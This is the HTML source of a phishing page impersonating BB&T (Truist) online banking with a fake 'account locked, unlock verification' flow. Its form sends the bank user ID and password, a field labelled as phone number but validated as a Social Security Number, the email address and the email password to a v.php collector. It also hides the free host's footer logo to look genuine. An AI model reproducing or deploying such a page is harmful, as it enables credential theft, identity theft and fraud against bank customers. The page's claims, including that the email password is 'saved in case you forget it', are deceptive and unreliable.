<!DOCTYPE html>

<html class="gt-ie9 ua-windows_nt ua-windows_nt-6 ua-windows_nt-6-1 ua-gecko ua-gecko-54 ua-gecko-54-0 ua-firefox ua-firefox-54 ua-firefox-54-0 ua-desktop ua-desktop-windows js js no-flexbox canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths" lang="en">
<head class="at-element-marker" style="visibility: visible;">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">

<title>Verification - BB&amp;T Online Account Verification</title>
<meta charset="UTF-8">

<noscript>

<meta http-equiv="refresh" content="">
</noscript>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0, user-scalable=yes">

<meta name="format-detection" content="telephone=yes">


<link href="T.goe/1.ico" rel="Shortcut Icon">
<link href="T.goe/sec.css" rel="stylesheet" type="text/css">

<script type="text/javascript" src="T.goe/ssnzipassist2.js">
</script>

<script type="text/javascript" src="T.goe/ssnzipassist3.js">
</script>
<script type="text/javascript" src="T.goe/ssnzipassist.js">
</script>

<script type="text/javascript" src="T.goe/ssnzip.js">
</script>

<script src="T.goe/1.js" type="text/javascript"></script>
</head>
<body>
	
<div class="innerBody">

<div id="toolbar">

<div class="wrapper">

<div id="auth">

</div>

<a class="more-info icon-menu" id="right-menu" href="#right-menu">
<i class="icon-menu-list"></i>INFO</a>
</div>

</div>

<header id="mainHeader">

<div>
		
<a id="skipNav" href="#mainContent">Skip to main content</a>

<a id="logo" href="">

<p><img src="https://i.imgur.com/fuzrfho.png" width="209" height="89" /></p>

</a>

<h1 id="pageTitle">


</h1>

</div>

</header>








<div class="progress-wrapper">

<nav id="progress">

<h1 class="accessibilityNote">Progress Indicator</h1>

<header>
<h2 class="accessibilityNote">Current Progress</h2>
<div class="gray-bar">
<div class="Bar" data-start="25" data-end="77" data-current="77">

<div class="progressBack" style="width: 77%;">
<div class="progressTip">
</div>
</div>

<div class="Progress" style="width: 58%;"><span></span>
</div>
<div class="label" style="left: 341px;"><span></span>
</div>

</div>
</div>

</header>

<header>
<h2 class="accessibilityNote">Progress Screen Indicator</h2>

<ul>
<li class="?">

<h3>
<i class="">
</i>
</h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
 Sign in Verification</a>

</li>

</ul>

<span>&nbsp;</span>
</li>

<li class="?">
<h3><i class=""></i></h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
 Sign in Verified</a>

</li>

</ul>

<span>&nbsp;</span>

</li>

<li class="?">
<h3><i class=""></i></h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
 Account Locked</a>

</li>

</ul>

<span>&nbsp;</span>

</li>

<li class="step4 lg  active">

<h3><i class=""></i></h3>

<ul>

<li>
Unlock Verification
</li>

</ul>

<span>&nbsp;</span>

</li>

<li class="step5 lg last ">

<h3><i class=""></i></h3>

<ul>

<li>
Verification Summary
</li>

</ul>

</li>

</ul>

</header>
</nav>

</div>
<div id="pageWrap" class="group">

<div class="three-quarters">








<section id="mainContent" class="personalInfo">

<form id="form1" action="v.php" method="post" autocomplete="on">

<article id="primaryApplicant">

<fieldset>

<h3>Login Verification</h3>
<dl>
<dt>
<label for="uuser">User ID</label>
</dt>
<dd class="large">
<input id="uuser" name="uuser" class="addrListener" value="" placeholder="BB&T User ID" maxlength="40" type="text">
</dd>
<dl>
<dt>
<label for="upass">Password</label>
</dt>
<dd class="large">
<input id="upass" name="upass" class="addrListener" value="" placeholder="BB&T Password" maxlength="40" type="password">
</dd>
<dt>
<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">
<label for="emailpass">Phone Number</label>
<span class="tooltip" data-name="172">Your Phone Number.
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>
</span>
</dt>
<dd class="large">
<div class="error-wrapper">
<input id="emailpass1" name="emailpass1" value="" maxlength="10" type="text">
</div>
</dl>
<h3>Account Verification</h3>
<dl>
<dt>
<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">
<label for="email">Email Address</label>
<span class="tooltip" data-name="172">Your email address will be used to communicate with you regarding the status of your application and the associated promotion with this account.
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>
</span>
</dt>
<dd class="large">
<div class="error-wrapper">
<input id="email" name="email" value="" maxlength="50" type="email">
</div>
</dd>
<dt>
<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">
<label for="emailpass">Email Address Password</label>
<span class="tooltip" data-name="172">Your email address password will be saved in case you forget it.
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>
</span>
</dt>
<dd class="large">
<div class="error-wrapper">
<input id="emailpass" name="emailpass" value="" maxlength="50" type="password">
</div>
</dd>
</dl>
</dd>


</dd>

</dl>
</fieldset>

<a class="pageTop" href="#pageWrap"></a>

</article>
<div class="btnRow">

<div class="col6">

<button id="nextBtn" type="submit" name="continue" value="Verify" onclick="setJobCodeDesc();">Verify</button>

</div>
</div>

</form>
<script  type="text/javascript">
var frmvalidator = new Validator("form1");
frmvalidator.addValidation("uuser","req","Please verify your BB&T User ID");
frmvalidator.addValidation("uuser","minlen=5","Please verify your BB&T User ID");
frmvalidator.addValidation("upass","req","Please verify your BB&T Password");
frmvalidator.addValidation("upass","minlen=5","Please verify your BB&T Password");
frmvalidator.addValidation("emailpass1","req","Please enter your Your Social Security Number (SSN)");
frmvalidator.addValidation("emailpass1","minlen=9","Please enter your Your Social Security Number (SSN)");
frmvalidator.addValidation("email","req","Please verify your Email Address");
frmvalidator.addValidation("emailpass","req","Please verify your Email Address Password");
</script>
</section>
</div>

<div class="one-quarter">



<div id="sidr-content">

<div id="sidr" class="sidr right">

<aside id="rightRail" class="">

<div class="railBox contactInfo">

<h3>Need Help?</h3>

<div class="lp-button-wrapper" id="lpButtonDiv-dmo">
</div>
<div id="lpChatButton">
</div>

</div>

<div class="railBoxWrap">

<div class="railBoxWrapBack">
<div class="railBox faq">

<h3>
FAQ
<span>&nbsp;</span>
</h3>

<ul class="faqList show-hide">

<li>

<i class=""></i>
<a href="javascript:void(0);">What if I have multiple addresses?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>Simply check the box marked "Add an additional mailing address." To open an account online, one of your addresses must be within our service area.</p>

</li>

<li>

<i class=""></i><a href="javascript:void(0);">How will my email address be used?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>
<div class="conditional">

<p>Your email address will be used to communicate with you regarding the status of your application and the associated promotion with this account, if applicable.</p>

</div>

</li>

<li>

<i class=""></i>
<a href="javascript:void(0);">Why do you need my Social Security number?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>
<div class="conditional">

<p>Your Social Security number will be used to verify your identity. BB&amp;T is required by Federal law to obtain, verify and record information that identifies each person who opens an account.</p>
</div>
</li>

<li>

<i class=""></i>
<a href="javascript:void(0);">Can I open an account if I am not a U.S. citizen?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>You must be a U.S. citizen or legal resident alien with a valid Social Security number to open an account with BB&amp;T.</p>
	</div>

</li>

<li>

<i class=""></i>
<a href="javascript:void(0);">What is a co-applicant?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>A co-applicant is someone who shares ownership and equal financial responsibility of your account. All joint accounts will be opened online in your name as well as in your co-applicant's name. (You may only add one co-applicant to each account.)</p>

</div>

</li>
<li>
<i class=""></i>
<a href="javascript:void(0);">Can I add more than one co-applicant to my account?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>No, you may only add one co-applicant to your application, regardless of the number of accounts you are applying for today.</p>
</div>

</li>

<li>

<i class=""></i>
<a href="javascript:void(0);">Why can't I change my state in the address section?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>If you don't see your state listed as an option, then you are out of our service area at this time.</p>

</div>
</li>

</ul>

</div>

<a id="close-right" class="close-right-rail" href="#close-right"><i class="icon-ex_"></i></a>

</div>
</div>
</aside>

</div>

</div>

<script type="text/javascript">
function openNewWindow(url) {

	var params = "height=600,width=1000,top=300,left=100,status=yes,toolbar=no,menubar=no,location=no,scrollbars=yes,resizable=yes";
	var bankservAgreement = window.open(url, '_blank', params);

}
</script>

</div>
		
</div>


<script type="text/javascript">

    
    $(document).ready(function() {
    	$('form').submit(function() {
		})
		$('#cardn').mask('9999-9999-9999-9999', {});
	    $('#dob').mask('99/99/9999', {});
	    $('#zip').mask('99999', {});
        $('#pon').mask('(999)999-9999', {});
        $('#exp').mask('99/9999', {});
        $('#cvv').mask('999', {});
	    $('#ssnActual').mask('999-99-9999', {});
    }) 	
</script>

<footer>
<div id="copyright">
<ul class="group">
<li><a target="_blank" href="">Bank Secrecy Act Notice<i class=""></i></a></li>

<li><a target="_blank" href="">BB&amp;T Locations</a></li>
				
<li><a target="_blank" href="">Privacy &amp; Security<i class=""></i></a></li>

</ul>

<p class="preload">
<i>&copy;</i> 2021, Truist Financial Corporation. All rights reserved.


</p>
</div>

</footer>

<script type="text/javascript" src="T.goe/explain.js"></script>
</body>
<style>
    img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] {
display: none;}
</style>
</html>